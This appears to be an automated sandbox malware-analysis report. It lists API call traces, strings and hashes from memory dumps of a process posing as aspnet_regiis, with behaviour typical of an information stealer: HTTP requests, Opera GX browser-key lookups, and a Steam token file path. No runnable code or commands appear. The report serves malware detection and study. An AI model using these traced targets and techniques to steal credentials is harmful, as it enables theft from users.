                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                            • String ID: nzA
                                                                                                                            • API String ID: 2104210347-1761861442
                                                                                                                            • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                            • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                                            • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                            • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                              • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                              • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                              • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                              • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                              • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                              • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                            • String ID: ERROR$ERROR
                                                                                                                            • API String ID: 3086566538-2579291623
                                                                                                                            • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                            • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                                                            • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                            • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4198075804-0
                                                                                                                            • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                            • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                                            • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                            • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1065093856-0
                                                                                                                            • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                            • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                                            • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                            • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                                            APIs
                                                                                                                            • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC23095
                                                                                                                              • Part of subcall function 6CC235A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CCAF688,00001000), ref: 6CC235D5
                                                                                                                              • Part of subcall function 6CC235A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC235E0
                                                                                                                              • Part of subcall function 6CC235A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC235FD
                                                                                                                              • Part of subcall function 6CC235A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC2363F
                                                                                                                              • Part of subcall function 6CC235A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC2369F
                                                                                                                              • Part of subcall function 6CC235A0: __aulldiv.LIBCMT ref: 6CC236E4
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC2309F
                                                                                                                              • Part of subcall function 6CC45B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC456EE,?,00000001), ref: 6CC45B85
                                                                                                                              • Part of subcall function 6CC45B50: EnterCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45B90
                                                                                                                              • Part of subcall function 6CC45B50: LeaveCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45BD8
                                                                                                                              • Part of subcall function 6CC45B50: GetTickCount64.KERNEL32 ref: 6CC45BE4
                                                                                                                            • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC230BE
                                                                                                                              • Part of subcall function 6CC230F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC23127
                                                                                                                              • Part of subcall function 6CC230F0: __aulldiv.LIBCMT ref: 6CC23140
                                                                                                                              • Part of subcall function 6CC5AB2A: __onexit.LIBCMT ref: 6CC5AB30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4291168024-0
                                                                                                                            • Opcode ID: 58887f45d4cc7a0a4fc86a24cd12d1cdc20f3e6c0855ebfa99c5666a1f1fb2b5
                                                                                                                            • Instruction ID: 5a9c8774d84f97b1cc1295034d764adcfd7641217aee7117d20f50894b58ed55
                                                                                                                            • Opcode Fuzzy Hash: 58887f45d4cc7a0a4fc86a24cd12d1cdc20f3e6c0855ebfa99c5666a1f1fb2b5
                                                                                                                            • Instruction Fuzzy Hash: 94F02D22E20B489BCB10DFB4A9451EEB774AF6B318F545319E89463531FF30A1E883D5
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateComputerNameProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1664310425-0
                                                                                                                            • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                            • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                                            • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                            • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                              • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                            • String ID: Opera GX
                                                                                                                            • API String ID: 1719890681-3280151751
                                                                                                                            • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                            • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                            • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                            • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-3916222277
                                                                                                                            • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                            • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                            • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                            • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Strings
                                                                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                            • API String ID: 502913869-3507145866
                                                                                                                            • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                            • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                            • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                            • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID: 1iA
                                                                                                                            • API String ID: 3494564517-1863120733
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            APIs
                                                                                                                            • malloc.MSVCRT ref: 0041CBC9
                                                                                                                              • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                              • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                              • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                            • malloc.MSVCRT ref: 0041CC06
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$lstrcpylstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2974738957-0
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1699248803-0
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                            • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                                                            • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                            • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                            • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                            • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                            • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55
                                                                                                                            APIs
                                                                                                                            • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC36CCC
                                                                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC36D11
                                                                                                                            • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC36D26
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CC36D35
                                                                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC36D53
                                                                                                                            • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CC36D73
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC36D80
                                                                                                                            • CertGetNameStringW.CRYPT32 ref: 6CC36DC0
                                                                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CC36DDC
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC36DEB
                                                                                                                            • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CC36DFF
                                                                                                                            • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CC36E10
                                                                                                                            • CryptMsgClose.CRYPT32(00000000), ref: 6CC36E27
                                                                                                                            • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CC36E34
                                                                                                                            • CreateFileW.KERNEL32 ref: 6CC36EF9
                                                                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CC36F7D
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC36F8C
                                                                                                                            • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CC3709D
                                                                                                                            • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC37103
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC37153
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CC37176
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC37209
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3723A
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3726B
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3729C
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC372DC
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3730D
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC373C2
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC373F3
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC373FF
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC37406
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC3740D
                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC3741A
                                                                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC3755A
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC37568
                                                                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CC37585
                                                                                                                            • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC37598
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC375AC
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                            • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                            • API String ID: 3256780453-3980470659
                                                                                                                            • Opcode ID: ccdd6fcbc26490d718b1e7629f44059804db5bf18e42a0810a7b19eaf42f9b6e
                                                                                                                            • Instruction ID: ad73e02b8f69867e7ffebffb1aab6344ae85c70a613901aae513ccdebfa90623
                                                                                                                            • Opcode Fuzzy Hash: ccdd6fcbc26490d718b1e7629f44059804db5bf18e42a0810a7b19eaf42f9b6e
